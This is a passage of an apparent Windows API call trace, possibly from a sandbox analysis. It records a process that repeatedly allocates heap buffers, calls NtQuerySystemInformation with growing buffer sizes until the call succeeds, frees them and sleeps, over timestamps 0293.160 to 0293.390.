ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0293.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.161] Sleep (dwMilliseconds=0x110) [0293.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0293.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0293.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0293.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0293.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0293.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0293.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0293.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0293.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.175] Sleep (dwMilliseconds=0x110) [0293.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0293.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0293.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0293.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0293.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0293.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0293.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0293.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0293.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.192] Sleep (dwMilliseconds=0x110) [0293.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0293.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0293.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0293.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0293.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0293.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0293.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0293.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0293.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.207] Sleep (dwMilliseconds=0x110) [0293.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0293.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0293.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0293.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0293.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0293.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0293.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0293.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0293.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.224] Sleep (dwMilliseconds=0x110) [0293.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0293.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0293.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0293.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0293.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0293.236] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.237] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0293.237] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0293.237] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0293.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.238] Sleep (dwMilliseconds=0x110) [0293.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0293.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0293.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0293.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0293.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0293.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0293.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0293.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0293.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.252] Sleep (dwMilliseconds=0x110) [0293.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0293.263] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0293.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0293.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0293.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0293.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0293.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0293.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0293.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.266] Sleep (dwMilliseconds=0x110) [0293.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0293.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0293.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0293.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0293.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0293.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0293.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0293.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0293.286] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.286] Sleep (dwMilliseconds=0x110) [0293.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0293.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0293.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0293.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0293.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0293.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0293.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0293.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0293.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.300] Sleep (dwMilliseconds=0x110) [0293.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0293.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0293.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0293.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0293.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0293.317] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0293.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0293.318] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.319] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0293.319] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.319] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.319] Sleep (dwMilliseconds=0x110) [0293.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0293.328] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0293.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0293.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0293.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0293.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0293.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0293.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0293.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.331] Sleep (dwMilliseconds=0x110) [0293.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0293.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0293.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0293.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0293.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0293.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0293.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0293.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0293.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.349] Sleep (dwMilliseconds=0x110) [0293.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0293.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0293.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0293.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0293.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0293.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0293.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0293.365] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0293.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0293.366] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0293.367] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0293.367] Sleep (dwMilliseconds=0x110) [0293.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0293.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0293.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0293.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0293.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0293.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0293.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0293.390] RtlAllocateHeap (HeapHandle=0x2560000, 